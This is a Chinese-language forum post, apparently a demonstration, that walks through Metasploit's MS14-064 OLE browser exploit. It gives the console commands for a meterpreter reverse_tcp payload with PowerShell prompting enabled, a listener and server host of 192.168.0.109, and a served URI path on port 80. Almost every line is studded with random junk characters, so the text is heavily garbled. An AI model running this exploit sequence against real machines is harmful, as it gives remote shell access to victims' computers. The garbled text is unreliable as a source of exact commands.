/ }' p$ ^$ S2 ]6 } Q( c" t
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示3 y# l5 X6 g# T# P! F8 E% T3 u
7 c8 A) i/ c/ S
9 ^6 d% j+ a4 E* g% v
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + R4 o5 J& J. v; ]. U6 x) h
. m/ E5 x+ S" n! D5 W7 M- I7 @
) Q3 c% e, ~0 \7 {: q
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp, y1 z3 x, O# ?* d2 }
/ k6 c1 I' n. x4 s( o
# r! ]9 Y3 ~6 n6 E) ^1 ? set AllowPowershellPrompt true9 @" I3 L- T. o, V( C# X2 e
, Z" u& ~2 X! r3 \; ^
5 O1 Q3 P. s, z; \# a: e# \) L1 s Set LHOST 192.168.0.109
0 W% h; h9 k4 @$ K
7 ~* X4 `. u5 ^( A* \
( l4 H) `6 [: l' Y0 g! |# ]4 J
set SRVHOST 192.168.0.109: I$ i, g5 C. c
$ V" u# V; X, ]. H- ~- q
1 [" S8 S% Y o1 W Set uripath share1 _) z8 H! k4 V5 N( r
5 \* U4 l1 b2 b( X) G! F! y
; N4 H( H' M) F4 f4 M( K7 G
Set srvport 80
* W( e+ t$ A- ?" L+ ]5 f
( E$ [* a" S$ k0 x& j3 }1 E
) B1 m) S9 B( D' i+ w0 b: M
- g. z2 \& }& {. {- M
: p% R& f+ ^# r; E0 H; T
1 B n' H1 }/ ^$ q 1 @' V* n4 t- V+ c& m" m. N# y! W
' u: t. R3 U6 L& q1 [
. t6 l: z& Z r * M, @( `9 L6 j9 M w8 D- K
3 m- q3 p4 ~$ m, r1 N1 ^9 K5 k+ f
9 [* c: Q6 Z: b# c9 j
! f/ H+ e5 M$ D5 e
" J: _" _6 X. O; `( R& g5 L1 M2 }
* m& K5 A% q( h1 H6 |# F1 x
$ s# {" @$ u# B5 ^! ]
: ?0 E9 q* J+ q) C* {! D. D9 z6 }8 j; c; O1 {; M
下面我们来访问本地地址如图:
* @3 Z% v8 N6 B0 o [6 C% d
7 K; _5 F9 h M0 p3 b9 z" `8 w
& |. M% \2 i* x- U8 d
7 \) C) c; D) u, G
# ?9 [) ~9 T0 q4 w
1 }' t* ?, G; L9 u2 [, S
6 ^& k0 U8 J8 @. h5 P3 p: N
# z. v p- m; F3 H, |, v6 ]$ M) {
" i1 o, t" v/ O" O